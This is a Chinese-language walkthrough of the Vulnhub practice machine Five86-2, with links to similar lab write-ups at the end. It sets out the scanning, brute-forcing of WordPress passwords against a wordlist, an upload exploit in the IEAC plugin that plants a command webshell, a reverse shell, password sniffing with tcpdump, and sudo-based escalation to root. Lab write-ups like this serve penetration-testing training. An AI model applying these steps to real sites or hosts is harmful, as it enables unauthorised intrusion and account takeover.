Vulnhub靶機Five86-2詳細解析

2021-02-22 合天智匯

VulnHub滲透測試實戰靶場Jarbas 1.0

https://www.hetianlab.com/expc.do?ec=ECIDfe8c-5c48-41ae-be67-6728d2ae15b2&pk_campaign=weixin-wemedia     

Jarbas1.0是一個難度為初級的Boot2root/CTF挑戰,實驗目的是獲取目標root shell得到flag。

上篇指路-Vulnhub靶機Five86-1詳細解析

靶機地址:http://www.vulnhub.com/entry/five86-2,418/ 

技術點總結

•對WordPress網站的滲透 

–wpscan 

•WordPress中IEAC插件的RCE漏洞 

–WordPress插件IEAC漏洞分析及組合利用嘗試

•tcpdump的使用 

–tcpdump使用詳解 

目標發現 

nmap -sP 參數使用 ping 掃描區域網主機,目的地址為 192.168.56.6

nmap -A 192.168.56.6 -p- 可以看到目標主機的一些信息,-A 是進行作業系統指紋和版本檢測,-p- 是全埠

開放了 22、21、80 埠,並且 80 埠是WordPress 5.1.4的CMS 這裡最好提前在/etc/hosts中加上192.168.56.6 five86-2這一條,因為後面訪問wordpress的後臺wp-admin時會跳轉到到這個域名

漏洞發現與利用 

在searchsploit和Google並沒有發現WordPress 5.1.4的漏洞,可以用wpscan掃描一下這個URL。wpscan是一款針對WordPress的掃描器,詳細的使用可以參考WPScan使用完整攻略。

默認掃描會返回目標站點的中間件、XML-RPC、readme文件、上傳路徑、WP-Corn、版本、主題、所有的插件和備份文件。 

命令wpscan -u http://192.168.56.6/

這裡並沒有發現很有用的信息,考慮去枚舉用戶名,然後配合rockyou.txt去爆破密碼。爆破用戶名命令wpscan --url http://192.168.56.6/ --enumerate u,發現了5個用戶

peter admin barney gillian stephen

爆破密碼命令wpscan --url http://192.168.56.6/ -U user.txt -P /usr/share/wordlists/rockyou.txt

最終爆破出來兩個結果

Username: barney, Password: spooky1
Username: stephen, Password: apollo1

使用barney登錄後臺http://five86-2/wp-admin/,可以看到這個站點安裝了三個插件,但是只激活了一個Insert or Embed Articulate Content into WordPress Trial(IEAC)

Akismet Anti-Spam    Version 4.1.1
Hello Dolly          Version 1.7.1
IEAC                 Version 4.2995

在谷歌上搜索一下,不難搜到這個插件的RCE:WordPress插件IEAC漏洞分析及組合利用嘗試,在exploit-db上也有

先生成poc.zip,

echo "hello" > index.html
echo "" > index.php
zip poc.zip index.html index.php

然後登錄wordpress後臺,選擇新建文章

選擇添加區塊

選擇E-Learning

上傳poc.zip

選擇Insert As iFrame

可以看到上傳的位置,也就是說上次的shell位置為

http://192.168.56.6/wp-content/uploads/articulate_uploads/poc/index.php

測試shellhttp://192.168.56.6/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami這就拿到了shell

使用php-reverse-shell去反彈shell,訪問

http://192.168.56.6/wp-content/uploads/articulate_uploads/poc4/shell.php

就可以看到反彈的shell,還不是TTY,接下來就想辦法變成TTY吧

ls /home發現有8個目錄,剛剛爆破來兩個密碼,一個登陸了後臺,還有一個沒有測試,並且兩個都在這8個用戶裡面。可以先試試su barney,密碼填spooky1,發現失敗,再試試stephen,密碼apollo1。這裡的shell不知道為什麼沒有前面的$了,但是可以用

實際上,這裡的www-data可以直接使用python3 -c 'import pty;pty.spawn("/bin/bash")'變成TTY,這樣可能更方便一些

然後再sudo -l發現需要密碼,並且不是spooky1,所以還是su stephen吧,發現stephen在一個名為pcap的用戶組中(pcap不是流量包嗎^_^)

然後sudo -l發現無法執行sudo

回到pcap那裡,流量包是不是意味著流量分析,嘗試ifconfig發現沒有這個命令,但是可以使用ip add,發現目前運行著幾個網絡接口

這裡的最後一個接口好像是動態的,每次都不一樣,可以使用tcpdump -D列出可用於抓包的接口。這裡選擇把後面兩個抓下來,因為不怎麼常見。抓包命令為timeout 120 tcpdump -w 1.pcap -i veth2c37c59,其中timeout 120是指2分鐘,-w是將結果輸出到文件,-i是指定監聽埠

可以去分析一下這兩個流量包,命令tcpdump -r 1.pcap,這裡-r是從給定的流量包讀取數據,不難發現paul用戶FTP的密碼esomepasswford。後面2.pcap與1.pcap內容相同。

接著su paul,用上面的那個密碼發現可以登陸。嘗試sudo -l發現stephen可以使用peter的service命令

那不就可以直接執行peter的/bin/bash了嗎。命令sudo -u peter service /bin/bash。這裡要注意一下目錄的問題,用相對目錄找到/bin/bash的位置

獲取peter的權限後,還是先sudo -l,發現他可以運行root用戶的passwd命令,這我直接修改root的密碼不就獲取root權限了嗎

是時候表演真正的技術了。sudo -u root passwd root(強迫症,全文一致),用sudo passwd root一樣的

找到flag

歡迎投稿至郵箱:EDU@antvsion.com

有才能的你快來投稿吧!

相關焦點

  • vulnhub系列之靶機Five86-2練習
    -A -p- 192.168.1.5掃描詳細信息,得到3個埠信息,80埠綁定的wordpress版本5.1.4wpscan --url http://192.168.1.5 -U /root/Documents/five86-2/user.txt -P /usr/share/wordlists/rockyou.txt
  • vulnhub靶機滲透-Connectthedots
    vulnhub靶機滲透-Connectthedots這個靶機比較腦洞,但是最後的提權過程挺有意思的。目標:/home/user.txt and /root/root.txt環境準備由於VMware會出現種種問題,於是改成了Virtual Box,而且Vulhub上的大部分靶機都是使用Virtual Box製作的附上一些相關的配置截圖:kali 2019.04第一塊網卡沒做修改添加了第二塊網卡vulnhub
  • DC-3靶機通關記錄
    一、靶機搭建官網連結:https://vulnhub.com/靶機下載地址:http://www.five86.com
  • Vulnhub-靶機-PWNOS: 2.0 (PRE-RELEASE)
    本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關靶機下載之後使用僅主機模式加載到本地
  • DC-1靶機通關記錄
    一、靶機搭建官網連結:https://download.vulnhub.com/dc/靶機下載地址:http://www.five86
  • Vulnhub-Gigachad靶機復現
    靶機介紹靶機地址:http://www.vulnhub.com/entry/gigachad-1,657/靶機難度:簡單靶機目標:get flag開整2 如下圖所示進行修改,然後重啟(F10)>得到靶機ip:192.168.154.178 ,此時我們進行埠探測2 埠探測nmap -sC -sV -p- -n -vv 192.168.154.178 --min-rate=2000
  • vulnhub系列之靶機Kevgir練習
    1、靶機下載地址https://www.vulnhub.com/entry/kevgir-1,137/2、nmap -sn 192.168.1.0
  • 【vulnhub】靶機-【DC系列】DC9(附靶機)
    www.ms08067.com)本文作者:大方子(Ms08067實驗室核心成員)主機信息Kali:192.168.56.113DC9:192.168.56.112實驗過程先進行主機探測,查找靶機的tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables ‐D INPUT ‐s %IP% ‐p tcp ‐‐dport 22 ‐j ACCEPT tcpflags = syn這裡提供2種敲擊方法
  • Vulnhub靶機 - SOCIAL NETWORK實踐
    2.2 內網發現查看下當前ip,發現並不是192.168.0.113,而是172.17.0.3,說明這是一臺內網的docker主機,自然而然的我們會想到將內網主機過濾下
  • Vulnhub 靶機實戰系列:DC -2
    與DC-1一樣,DC-2是另一個專門構建的易受攻擊的實驗室,目的是獲得滲透測試領域的經驗。與原始DC-1一樣,它在設計時就考慮了初學者。必須具備Linux技能並熟悉Linux命令行,以及一些基本滲透測試工具的經驗。與DC-1一樣,共有五個標誌,包括最終標誌。上篇文章有詳細搭建過程,在此就不再演示。
  • Vulnhub 靶機實戰系列:DC -4
    下載地址:https://www.five86.com/dc-4.html則靶機DC-4 ip:192.168.188.159(NAT連接)攻擊機kalilinux ip:192.168.188.144用netdiscover -r 192.168.188.0/24 掃描ip,得到靶機ip 192.168.188.159先來埠掃描利用
  • vulnhub綜合靶場:MyExpense: 1
    虛擬機沙箱區域IP位址百香果沙盤Kali 2021(VPS)網際網路攻擊區66.28.6.100靶機攻擊目標-公司總部區域網 DMZ區(Z-DMZ)66.28.7.2Windows 7 or 10網際網路攻擊區
  • VulnHub之Sumo:1
    虛擬機信息:虛擬機下載地址:https://www.vulnhub.com
  • 滲透測試實戰——DC-5+DC-6靶機入侵
    愛寫靶機文章的我又來了…最近工作忙到飛起,根本沒空忙自己的事情..所以遲遲沒有更新,這次給大家帶來的是DC-5、DC-6的靶機wp,本來準備把 DC-2-DC-4的一起寫的,結果發現已經有小夥伴搶先寫了DC-5: http://www.five86.com/dc-5.htmlDC-6: http://www.five86.com/dc-6.html
  • vulnhub系列之靶機DC-5練習
    連結:https://pan.baidu.com/s/1wklyEuS5yJxLFKpq2Pp5Xg 提取碼:xcj41、nmap -sA 192.168.1.0/24掃描靶機ip地址2、nmap -sS -A -p- 192.168.1.8掃描靶機更詳細信息,掃到了3個埠,其中80綁定了nginx服務
  • FristiLeaks v1.3靶機滲透
    1.3.ova.torrenthttps://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova環境:訪問下這張圖片,發現顯示了內容中的aaa,說明可以解析phphttp://192.168.50.174/fristi/uploads/post.php.jpg
  • 靶機實戰 |『VulnHub系列』Bottleneck 1-Walkthrough
    靶機地址:https://www.vulnhub.com
  • 【創宇小課堂】滲透測試-Vulhub靶機實操記錄
    網址:https://www.vulnhub.com靶機連結:https://www.vulnhub.com/entry/ha-chakravyuh,388/下載連結:https://download.vulnhub.com/ha/chakravyuh.zip
  • php反序列化靶機實戰
    本文目錄:0x01:靶機下載地址
  • VulnHub| 實戰靶場ACID
    ----  網易雲熱評靶機下載地址: https://download.vulnhub.com/acid/Acid.rar  該靶機主分析web頁面拿到shell權限獲取flag。該靶機需登錄,不知ip號,所以先要獲取IP號,利用arp-scan工具, 命令為:arp-scan -l 。